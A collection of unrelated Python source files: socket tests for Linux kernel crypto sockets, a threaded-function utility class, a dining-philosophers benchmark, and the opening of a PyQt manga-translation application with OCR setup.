algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
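# A minimal sketch (not part of the test suite, Linux-only) of the AF_ALG
# hashing pattern used by test_sha256() above: bind the algorithm socket to
# ('hash', 'sha256'), accept an operation socket, write the data and read the
# 32-byte digest back. The helper name is hypothetical.
def _example_af_alg_sha256(data):
    with socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0) as algo:
        algo.bind(('hash', 'sha256'))
        op, _ = algo.accept()
        with op:
            op.sendall(data)
            return op.recv(32)          # sha256 digests are 32 bytes long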
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
        # available for a long time
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
thread_function.py
|
# coding=utf-8
# Copyright 2021 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A utility class to run a function in a separate daemon thread."""
import abc
import enum
import queue
import threading
from typing import Optional
from absl import logging
class ThreadFunction(metaclass=abc.ABCMeta):
"""Base class that encapsulates long-lived functions in a separate thread."""
class Signal(enum.IntEnum):
"""Defines commands we can use to communicate with the internal thread."""
# The thread should be stopped to allow for graceful termination.
KILL = 1
def __init__(self, block_input: bool, block_output: bool, name: str):
"""Initializes this ThreadFunction.
Args:
block_input: Whether to block this thread when reading its input queue.
block_output: Whether to block this thread when writing to its
output queue.
name: Name of the thread. Used to keep track of threads in logging.
"""
self._block_input = block_input
self._block_output = block_output
self._name = name
self._input_queue = queue.Queue()
self._output_queue = queue.Queue()
self._should_run = True
self._internal_thread = threading.Thread(target=self._run)
self._internal_thread.daemon = True
self._internal_thread.start()
def read(self, block: bool = True, timeout: Optional[float] = None):
"""'Public' method for clients to read values _from_ this thread.
Args:
block: Whether the client should block.
timeout: Timeout for getting output from the queue, in seconds.
Returns:
The value produced by the underlying thread.
"""
try:
return self._output_queue.get(block=block, timeout=timeout)
except queue.Empty:
return None
def write(self, value, block: bool = True, timeout: Optional[float] = None):
"""'Public' method for clients to write values _to_ this thread.
Args:
value: The value to send to the underlying thread.
block: Whether the client should block.
timeout: Timeout for setting input in the queue, in seconds.
"""
self._input_queue.put(value, block=block, timeout=timeout)
@abc.abstractmethod
def main(self):
"""main() function that subclasses need to override."""
pass
def kill(self):
"""Shorthand for clients to terminate this thread."""
logging.info('Killing %s thread', self._name)
# Sending a kill signal to clean up blocked read_values.
self.write(ThreadFunction.Signal.KILL, block=True)
# Stopping the _run loop.
self._should_run = False
def _run(self):
"""'Private' method that reruns main() until explicit termination."""
logging.info('Starting %s thread.', self._name)
while self._should_run:
self.main()
logging.info('Finished %s thread.', self._name)
def _read_value(self):
"""'Protected' method for subclasses to read values from their input."""
try:
return self._input_queue.get(block=self._block_input)
except queue.Empty:
pass # Ignore empty queues. Keep going.
def _write_value(self, value):
"""'Protected' method for subclasses to write values to their output."""
self._output_queue.put(value, block=self._block_output)
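# --- Illustrative usage sketch (added; not part of the original module) ---
# A minimal subclass showing how main() is typically paired with _read_value()
# and _write_value(). EchoThreadExample and the interaction below are
# hypothetical and only demonstrate the ThreadFunction API above.
class EchoThreadExample(ThreadFunction):
  """Echoes every value written to it until it receives Signal.KILL."""
  def main(self):
    value = self._read_value()
    if value is None:
      return  # Empty input queue (only possible with non-blocking reads); _run() retries.
    if value == ThreadFunction.Signal.KILL:
      self._should_run = False
      return
    self._write_value(value)
# Expected interaction (hypothetical):
#   echo = EchoThreadExample(block_input=True, block_output=True, name='echo')
#   echo.write('hello')
#   echo.read(timeout=1.0)  # -> 'hello'
#   echo.kill()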
|
3_philosophers.py
|
from threading import Semaphore, Thread
from time import sleep
from timeit import Timer
import random
rand = random.Random()
rand.seed(100)
# number of philosophers
num_p = 20
# number of meals per philosopher
r = 100
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
# Tanenbaum solution: index of the left-hand neighbour
def t_left(i):
return (i+num_p-1)%num_p
# footman and left-handed solutions: left fork index
def left(i):
return i
def right(i):
return (i+1)%num_p
def thinking():
sleep(rand.random()/10)
#sleep(0.00001)
#sleep(rand.random()/10)
def eating():
#print("philosopher " + str(i) + " is eating")
sleep(rand.random()/10)
#sleep(rand.random())
#sleep(rand.random()/10)
#############footman################
footman = Semaphore(num_p-1)
footman_forks =[Semaphore(1) for i in range(num_p)]
def footman_totime():
ts = [Thread(target=footman_come, args=[i,footman_forks]) for i in range(num_p)]
#print('****')
for t in ts: t.start()
for t in ts: t.join()
def footman_get_fork(i,footman_forks):
footman.acquire()
#print("philosopher " + str(i) + " comes")
footman_forks[right(i)].acquire()
footman_forks[left(i)].acquire()
eating()
def footman_put_fork(i,footman_forks):
footman_forks[right(i)].release()
footman_forks[left(i)].release()
footman.release()
#print("philosopher " + str(i) + " has done his meal")
thinking()
def footman_come(i,footman_forks):
for j in range (0,r):
footman_get_fork(i,footman_forks)
footman_put_fork(i,footman_forks)
#print("fottman -- p "+str(i)+ " round: " + str(j))
#############footman################
#############left_hand solution################
left_hand_forks =[Semaphore(1) for i in range(num_p)]
temp = random.randint(0, num_p-1)
def left_hand_totime():
ts = [Thread(target=left_hand, args=[i,left_hand_forks]) for i in range(num_p)]
for t in ts: t.start()
for t in ts: t.join()
def left_hand(i,left_hand_forks):
#print("*******temp: " + str(temp) + " ********")
for j in range (0,r):
if(i == 1):
#print("1111 get fork left : " + str(i))
left_hand_forks[left(i)].acquire()
#print("1111 get fork left : " + str(right(i)))
left_hand_forks[right(i)].acquire()
else:
#print("right 3333: " + str(right(i)) )
left_hand_forks[right(i)].acquire()
#print("left 555555; " + str(i))
left_hand_forks[left(i)].acquire()
eating()
left_hand_forks[right(i)].release()
left_hand_forks[left(i)].release()
thinking()
#print("left_hand -- p "+str(i)+ " round: " + str(j))
#############left_hand solution################
#############Tanenbaum's solution################
Tanenbaum_forks =[Semaphore(0) for i in range(num_p)]
t_mutex =Semaphore(1)
state=['thinking']*num_p
# store how many meals each philosopher has eaten
count=[0]*num_p
def Tanenbaum_totime():
ts = [Thread(target=Tanenbaum, args=[i,Tanenbaum_forks,state]) for i in range(num_p)]
for t in ts: t.start()
for t in ts: t.join()
def test(i):
if state[i] == 'hungry' and state[t_left(i)] != 'eating' and state[right(i)] != 'eating':
        # Only let a philosopher eat if they have eaten no more meals than
        # either neighbour, to keep the schedule roughly fair
if count[t_left(i)] - count[i] >= 0 and count[right(i)] - count[i] >= 0:
state[i] = 'eating'
            #print(i)
count[i]+=1
Tanenbaum_forks[i].release()
def t_get_fork(i):
t_mutex.acquire()
state[i]='hungry'
test(i)
t_mutex.release()
Tanenbaum_forks[i].acquire()
def t_put_fork(i):
t_mutex.acquire()
state[i] ='thinking'
test(right(i))
test(t_left(i))
t_mutex.release()
def Tanenbaum(i,Tanenbaum_forks,state):
for j in range (0,r):
t_get_fork(i)
eating()
t_put_fork(i)
thinking()
#############Tanenbaum's solution################
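# Note (added context, not from the original author): the three solutions timed
# below avoid deadlock in different ways. The footman solution limits the table
# to num_p-1 philosophers via a counting semaphore, so at least one philosopher
# can always pick up both forks. The left-handed solution makes one philosopher
# (here i == 1) pick up the forks in the opposite order, breaking the
# circular-wait condition. The Tanenbaum solution tracks per-philosopher state
# and lets a philosopher eat only when neither neighbour is eating, with test()
# adding a meal-count check for fairness.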
def main():
#--------footman------
timer1 = Timer(footman_totime)
print("1. Footman solution---Time: {:0.3f}s".format(timer1.timeit(10)/10))
#--------footman------
#print("aaaaaaaaaa")
#--------left_hand solution------
timer2 = Timer(left_hand_totime)
print("2. left_hand solution ---Time: {:0.3f}s".format(timer2.timeit(10)/10))
#--------left_hand solution------
#--------Tanenbaum's solution------
timer3 = Timer(Tanenbaum_totime)
print("3. Tanenbaum solution ---Time: {:0.3f}s".format(timer3.timeit(10)/10))
#--------Tanenbaum's solution------
#for c in range(0,num_p):
#thread = Thread(target=footman_come,args=(c,footman_forks))
#thread.start()
#sleep(rand.random())
if __name__ == "__main__":
main()
|
main.py
|
import glob
import os
import shutil
import sys
import threading
import time
import configparser
import eventlet
from tkinter import messagebox, Tk, filedialog, colorchooser
import cv2
import numpy as np
from PIL import Image
from PyQt6 import QtWidgets, QtCore, QtGui
from translate import translate, change_translate_mod
from covermaker import conf, render
from inpainting import Inpainting
from interface import Ui_MainWindow
from characterStyle import Ui_Dialog as CharacterStyleDialog
from textblockdetector import dispatch as textblockdetector
from utils import compute_iou
# tkinter dialog initialization
root = Tk()
root.withdraw()
# allow breaking out of slow calls on timeout
eventlet.monkey_patch()
# signal used to redirect console output
class Shell(QtCore.QObject):
newText = QtCore.pyqtSignal(str)
def write(self, text):
self.newText.emit(str(text))
# program parameters
class var:
    img_language = 'ja'  # source language
    word_language = 'zh-CN'  # target (translation) language
    word_way = 0  # text layout direction
    word_conf = conf.Section()  # text rendering parameters
    word_mod = 'auto'  # text positioning mode
    img_re_bool = True  # image inpainting on/off
    img_re_mod = 1  # image inpainting mode
# runtime cache
class memory():
    model = None  # OCR model
    img_show = None  # image currently displayed
    img_mark = None  # text mask
    img_mark_more = None  # extended text mask
    img_repair = None  # inpainted image
    img_textlines = []  # detected text-line boxes
    textline_box = []  # boxes inside the selected region
    img_in = None  # input image
    img_out = None  # output image
    task_out = ''  # export directory
    task_name = []  # file names
    task_img = []  # original images
    action_save_num = 0  # undo history counter
    action_save_img = []  # undo snapshots
    range_choice = [0, 0, 0, 0]  # currently selected region
# runtime state
class state():
    mod_ready = False  # whether the OCR model is loaded
    action_running = False  # whether an action is in progress
    text_running = False  # whether the current action is plain text insertion
    img_half = False  # whether the current image is shown at half size
    task_num = 0  # number of queued images
    task_end = 0  # number of finished images
    ttsing = False  # TTS output lock (multithreading not used)
# main window
class MainWindow(QtWidgets.QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.ui = Ui_MainWindow()
self.setWindowIcon(QtGui.QIcon('ico.png'))
self.ui.setupUi(self)
self.var = var()
self.state = state()
self.memory = memory()
        sys.stdout = Shell(newText=self.shelltext)  # redirect stdout to the textEdit below
print('여기는 콘솔입니다')
        self.uireadly()  # wire up button slots
        self.thredstart()  # start deferred startup tasks
    def mouseMoveEvent(self, e: QtGui.QMouseEvent):  # override move event to drag the window
if self._tracking:
self._endPos = e.globalPosition().toPoint() - self._startPos
self.move(self._winPos + self._endPos)
def mousePressEvent(self, e: QtGui.QMouseEvent):
if e.button() == QtCore.Qt.MouseButton.LeftButton:
self._winPos = self.pos()
self._startPos = QtCore.QPoint(e.globalPosition().toPoint())
self._tracking = True
def mouseReleaseEvent(self, e: QtGui.QMouseEvent):
if e.button() == QtCore.Qt.MouseButton.LeftButton:
self._tracking = False
self._startPos = None
self._endPos = None
    # read an image; works around cv2.imread failing on non-ASCII paths
def cv2_imread(self, path):
img = Image.open(path)
img = cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)
return img
    # append console output to the text widget
def shelltext(self, text):
if text!='\n':
self.ui.textEdit_3.append(text)
self.ui.textEdit_3.moveCursor(QtGui.QTextCursor.MoveOperation.End)
    # signal/slot wiring
def uireadly(self):
self.ui.action1.triggered.connect(
lambda event: QtGui.QDesktopServices.openUrl(QtCore.QUrl('https://sljly.xyz/')))
self.ui.action2.triggered.connect(
lambda event: QtGui.QDesktopServices.openUrl(QtCore.QUrl('https://github.com/jtl1207/comic-translation/')))
# self.ui.action3.triggered.connect(lambda event: print('1111'))
self.ui.actionja.triggered.connect(lambda event: self.change_mod('ja'))
self.ui.actionen.triggered.connect(lambda event: self.change_mod('en'))
self.ui.actionko.triggered.connect(lambda event: self.change_mod('ko'))
self.ui.actioncn.triggered.connect(lambda event: self.change_out_language('cn'))
self.ui.actionen_2.triggered.connect(lambda event: self.change_out_language('en'))
self.ui.actionKorean.triggered.connect(lambda event: self.change_out_language('ko'))
self.ui.actionin_imgs.triggered.connect(lambda event: self.change_img(True))
self.ui.actionin_img.triggered.connect(lambda event: self.change_img(False))
# self.actionfont = QtWidgets.QWidgetAction(self.menuBar)
# self.actionfont.setObjectName('actionfont')
# self.actionfont.setText("导入字体")
# self.menuBar.addAction(self.actionfont)
self.ui.actionfont.triggered.connect(lambda event: self.change_font())
self.ui.pushButton_2.clicked.connect(lambda event: self.change_word_way())
self.ui.pushButton_13.clicked.connect(lambda event: self.change_word_mod())
self.ui.pushButton_16.clicked.connect(lambda event: self.new_character_style_window())
self.ui.pushButton_8.clicked.connect(lambda event: self.change_img_re())
self.ui.pushButton_11.clicked.connect(lambda event: self.change_img_mod())
self.ui.pushButton_4.clicked.connect(lambda event: self.translation_img())
self.ui.pushButton_14.clicked.connect(lambda event: self.text_add())
self.ui.pushButton_12.clicked.connect(lambda event: self.text_clean())
self.ui.pushButton_9.clicked.connect(lambda event: self.auto_text_clean())
self.ui.pushButton_10.clicked.connect(lambda event: self.auto_translation())
self.ui.pushButton_7.clicked.connect(lambda event: self.cancel())
self.ui.pushButton_6.clicked.connect(lambda event: self.save())
self.ui.pushButton.clicked.connect(lambda event: self.tts())
self.ui.pushButton_3.clicked.connect(lambda event: self.change_translate_mod())
self.ui.pushButton_5.clicked.connect(lambda event: self.doit())
self.ui.pushButton_15.clicked.connect(lambda event: self.closeit())
    # deferred startup tasks (run on timers)
def thredstart(self):
QtCore.QTimer.singleShot(500, self.config_read)
QtCore.QTimer.singleShot(1000, self.thred_cuda)
QtCore.QTimer.singleShot(1500, self.thread_net)
    # check CUDA status
def thred_cuda(self):
try:
import paddle
if paddle.device.get_device() == 'cpu':
print('paddle:cuda예외,cpu모드')
self.ui.label_10.setText('cpu')
elif paddle.device.get_device() == 'gpu:0':
print(f'paddle:cuda보통')
except:
print('Error:paddle예외')
self.ui.label_10.setText('예외')
try:
import torch
if torch.cuda.is_available():
print("pytorch:cuda보통")
else:
print("pytorch:cuda예외,cpu모드")
self.ui.label_10.setText('cpu')
except:
print('Error:pytorch예외')
self.ui.label_10.setText('예외')
try:
import tensorflow as tf
if tf.config.list_physical_devices('GPU'):
print("tensorflow:cuda보통")
else:
print("tensorflow:cuda예외,cpu모드")
self.ui.label_10.setText('cpu')
except:
print('Error:tensorflow예외')
self.ui.label_10.setText('예외')
if self.ui.label_10.text() == '检测中':
self.ui.label_10.setText('보통')
    # check network status
def thread_net(self):
t = time.time()
try:
with eventlet.Timeout(20, False):
text = translate("hello", "zh-CN", "auto", in_mod=3)
if text != '你好':
print('google번역:네트워크 이상,프록시를 사용하지 않는 것이 좋습니다.')
else:
print(f'google번역:네트워크 정상,ping:{(time.time() - t) * 1000:.0f}ms')
except:
print('google번역:네트워크 이상,프록시를 사용하지 않는 것이 좋습니다.')
t = time.time()
try:
with eventlet.Timeout(20, False):
text = translate("hello", "zh-CN", "auto", in_mod=1)
if text != '你好':
print('deepl번역:네트워크 이상,프록시를 사용하지 않는 것이 좋습니다.')
else:
print(f'deepl번역:네트워크 정상,ping:{(time.time() - t) * 1000:.0f}ms')
except:
print('deepl번역:네트워크 이상,프록시를 사용하지 않는 것이 좋습니다.')
from gtts.tts import gTTS
import pyglet
try:
tts = gTTS(text='お兄ちゃん大好き', lang='ja')
filename = 'temp.mp3'
tts.save(filename)
music = pyglet.media.load(filename, streaming=False)
music.play()
time.sleep(music.duration)
os.remove(filename)
print(f'TTS:네트워크 정상')
except:
print('TTS:네트워크 이상,프록시를 사용하지 않는 것이 좋습니다.')
    # switch the detection (source) language
def change_mod(self, language):
self.ui.actionja.setChecked(False)
self.ui.actionen.setChecked(False)
self.ui.actionko.setChecked(False)
if language == 'ja':
thread_language = threading.Thread(target=self.thread_language('ja'))
elif language == 'en':
thread_language = threading.Thread(target=self.thread_language('en'))
elif language == 'ko':
thread_language = threading.Thread(target=self.thread_language('ko'))
thread_language.setDaemon(True)
thread_language.start()
print(f'Info:탐지 언어 전환{language}')
self.config_save('img_language', language)
def thread_language(self, language):
self.state.mod_ready = False
self.ui.label_4.setText('로드되지 않음')
if language == 'ja':
from manga_ocr.ocr import MangaOcr
self.memory.model = MangaOcr()
self.ui.actionja.setChecked(True)
elif language == 'en':
import paddleocr
self.memory.model = paddleocr.PaddleOCR(
                show_log=False,  # disable logging
                use_gpu=True,  # use GPU
                cls=False,  # angle classification
                det_limit_side_len=320,  # maximum long-side size fed to the detector
                det_limit_type='max',  # how the input size is limited; limit_type in [max, min], usually a multiple of 32, e.g. 960
                ir_optim=False,
                use_fp16=False,  # 16-bit half precision
                use_tensorrt=False,  # use TensorRT
                gpu_mem=6000,  # GPU memory (MB) reserved at initialization
                cpu_threads=20,
                enable_mkldnn=True,  # whether to enable MKL-DNN
                max_batch_size=512,  # maximum batch size
                cls_model_dir='paddleocr/model/cls',
                # location of the cls model
                # image_dir="",  # image or folder path used when predicting from the command line
                det_algorithm='DB',  # detection algorithm, DB/EAST
                det_model_dir='paddleocr/model/det/det_infer',
                # detection model folder; either None (auto-download the built-in model to ~/.paddleocr/det) or a converted inference model path containing the model and params files
                # DB (alternatives: EAST, SAST)
                det_db_thresh=0.3,  # binarization threshold for the DB output map
                det_db_box_thresh=0.6,  # box threshold for DB output; boxes below it are dropped
                det_db_unclip_ratio=1.3,  # expansion ratio of DB output boxes
                use_dilation=True,  # dilate the segmentation map
                det_db_score_mode="fast",  # score mode: fast = original rectangle method, slow = polygon method
                # text recognizer parameters
                rec_algorithm='CRNN',  # recognition algorithm
                rec_model_dir='paddleocr/model/rec/ch_rec_infer',
                # recognition model folder; either None (auto-download the built-in model to ~/.paddleocr/rec) or a converted inference model path containing the model and params files
                # rec_image_shape="3,32,320",  # input image shape of the recognition algorithm
                # cls_batch_num=36,  #
                # cls_thresh=0.9,  #
                lang='ch',  # language (this uses the Chinese/English model)
                det=True,  # detect text positions
                rec=True,  # recognize text content
                use_angle_cls=False,  # recognize vertical text
                rec_batch_num=36,  # number of images run through recognition at once
                max_text_length=30,  # maximum text length the recognizer can handle
                # rec_char_dict_path='',  # recognition dictionary path, needed when rec_model_dir points to a custom model
                use_space_char=True,  # whether to recognize spaces
)
self.ui.actionen.setChecked(True)
elif language == 'ko':
import paddleocr
self.memory.model = paddleocr.PaddleOCR(
                # show_log=False,  # disable logging
                use_gpu=True,  # use GPU
                cls=False,  # angle classification
                det_limit_side_len=320,  # maximum long-side size fed to the detector
                det_limit_type='max',  # how the input size is limited; limit_type in [max, min], usually a multiple of 32, e.g. 960
                ir_optim=False,
                use_fp16=False,  # 16-bit half precision
                use_tensorrt=False,  # use TensorRT
                gpu_mem=6000,  # GPU memory (MB) reserved at initialization
                cpu_threads=20,
                enable_mkldnn=True,  # whether to enable MKL-DNN
                max_batch_size=512,  # maximum batch size
                cls_model_dir='paddleocr/model/cls',
                # location of the cls model
                # image_dir="",  # image or folder path used when predicting from the command line
                det_algorithm='DB',  # detection algorithm, DB/EAST
                det_model_dir='paddleocr/model/det/det_infer',
                # detection model folder; either None (auto-download the built-in model to ~/.paddleocr/det) or a converted inference model path containing the model and params files
                # DB (alternatives: EAST, SAST)
                det_db_thresh=0.3,  # binarization threshold for the DB output map
                det_db_box_thresh=0.6,  # box threshold for DB output; boxes below it are dropped
                det_db_unclip_ratio=1.3,  # expansion ratio of DB output boxes
                use_dilation=True,  # dilate the segmentation map
                det_db_score_mode="fast",  # score mode: fast = original rectangle method, slow = polygon method
                # text recognizer parameters
                rec_algorithm='CRNN',  # recognition algorithm
                rec_model_dir='paddleocr/model/rec/ko_rec_infer',
                # recognition model folder; either None (auto-download the built-in model to ~/.paddleocr/rec) or a converted inference model path containing the model and params files
                # rec_image_shape="3,32,320",  # input image shape of the recognition algorithm
                # cls_batch_num=36,  #
                # cls_thresh=0.9,  #
                lang='korean',  # language
                det=True,  # detect text positions
                rec=True,  # recognize text content
                use_angle_cls=False,  # recognize vertical text
                rec_batch_num=36,  # number of images run through recognition at once
                max_text_length=30,  # maximum text length the recognizer can handle
                # rec_char_dict_path='',  # recognition dictionary path, needed when rec_model_dir points to a custom model
                use_space_char=True,  # whether to recognize spaces
)
self.ui.actionko.setChecked(True)
self.state.mod_ready = True
self.ui.label_4.setText(f'{language}')
self.var.img_language = language
def change_out_language(self, language):
self.ui.actioncn.setChecked(False)
self.ui.actionen_2.setChecked(False)
self.ui.actionKorean.setChecked(False)
if language == 'cn':
self.var.word_language = 'zh-CN'
self.ui.actioncn.setChecked(True)
elif language == 'en':
self.var.word_language = 'en'
self.ui.actionen_2.setChecked(True)
elif language == 'ko':
self.var.word_language = 'ko'
self.ui.actionKorean.setChecked(True)
print(f'Info: 출력 언어{self.var.word_language}')
self.config_save('word_language', self.var.word_language)
    # load images
def change_img(self, s):
if self.state.task_num != self.state.task_end:
if not messagebox.askyesno('제시', '현재 작업 중입니다. 대기열을 비울까요?'):
return
self.state.task_num = 0
self.state.task_end = 0
self.memory.task_out = ''
self.memory.task_name = []
self.memory.task_img = []
if s:
path = filedialog.askdirectory()
if path == '':
return
files = []
for ext in (
'*.BMP', '*.DIB', '*.JPEG', '*.JPG', '*.JPE', '*.PNG', '*.PBM', '*.PGM', '*.PPMSR', '*.RAS',
'*.TIFF',
'*.TIF', '*.EXR', '*.JP2', '*.WEBP'):
files.extend(glob.glob(os.path.join(path, ext)))
            files.sort(key=lambda x: int("".join(list(filter(str.isdigit, x)))))  # sort file names numerically
self.memory.task_out = os.path.dirname(path) + '/out/'
for file_path in files:
try:
try:
img = cv2.imread(file_path)
height, width, channel = img.shape
except:
img = self.cv2_imread(file_path)
height, width, channel = img.shape
if channel == 1:
img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB)
self.memory.task_img.append(img)
self.state.task_num += 1
self.memory.task_name.append(os.path.basename(file_path))
except:
messagebox.showerror(title='Error', message=f'{file_path}그림 읽기Error')
if self.state.task_num == 0:
self.panel_clean()
print(f'War:그림이 감지되지 않음')
else:
self.panel_shownext()
print(f'Info:그림 가져오기{self.state.task_num}성공')
else:
            filetypes = [("支持格式",
                          "*.BMP;*.DIB;*.JPEG;*.JPG;*.JPE;*.PNG;*.PBM;*.PGM;*.PPMSR;*.RAS;*.TIFF;*.TIF;*.EXR;*.JP2;*.WEBP")]
path = filedialog.askopenfilename(title='단일 사진 선택', filetypes=filetypes)
if path == '':
return
root, ext = os.path.splitext(os.path.basename(path))
try:
try:
img = cv2.imread(path)
height, width, channel = img.shape
except:
img = self.cv2_imread(path)
height, width, channel = img.shape
if channel == 1:
img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB)
self.memory.task_img.append(img)
self.state.task_num = 1
self.state.task_end = 0
self.memory.task_out = os.path.dirname(path)
self.memory.task_name = []
self.memory.task_name.append(f'{root}_re{ext}')
self.panel_shownext()
print(f'Info:그림 가져오기{self.state.task_num}성공')
except:
messagebox.showerror(title='Error', message=f'{path}그림 읽기Error')
self.state.task_num = 0
self.panel_clean()
if self.state.task_num > 0:
self.ui.img.flag_switch = True
self.ui.pushButton_4.setEnabled(True)
self.ui.pushButton_14.setEnabled(True)
self.ui.pushButton_12.setEnabled(True)
self.ui.pushButton_9.setEnabled(True)
self.ui.pushButton_6.setEnabled(True)
    # load a font
def change_font(self):
filetypes = [("支持格式", "*.TTF;*.TTC;*.OTF")]
path = filedialog.askopenfilename(title='选择字体', filetypes=filetypes, initialdir='./covermaker/fonts')
if path == '':
return
else:
if not os.path.exists(f'covermaker/fonts/{os.path.basename(path)}'):
shutil.copyfile(f'{path}', f'covermaker/fonts/{os.path.basename(path)}')
self.var.word_conf.font = f'{os.path.basename(path)}'
self.ui.label_6.setText(f'{os.path.basename(path)}')
self.config_save('font', self.var.word_conf.font)
    # clear the panel
def panel_clean(self):
self.ui.img.clear()
self.ui.img.setFixedWidth(450)
self.ui.img.setFixedHeight(696)
self.ui.img.setText(
'1.왼쪽상단에 만화를 가져옵니다 번역할 언어를 선택하세요\n2.자동 번역이나 수동 영역 선택 \n3. 수동 번역은 오른쪽 하단에 그림 순서와 이름 \n4. 환경 요구사항은 네트워크가 필수입니다 \n5.인터넷이 안될경우 번역을 할수없으니 주의바합니다')
self.ui.img.setStyleSheet('background-color:rgb(255,255,255);\ncolor:rgba(0,0,0,255);')
self.ui.label_3.setText(f'{self.state.task_end}/{self.state.task_num}')
self.memory.action_save_num = 0
self.memory.action_save_img = []
    # update the panel with the next image
def panel_shownext(self):
self.ui.img.setStyleSheet('background-color:rgb(255,255,255);\ncolor:rgba(0,0,0,0);')
img = self.memory.task_img[self.state.task_end]
self.memory.img_show = img.copy()
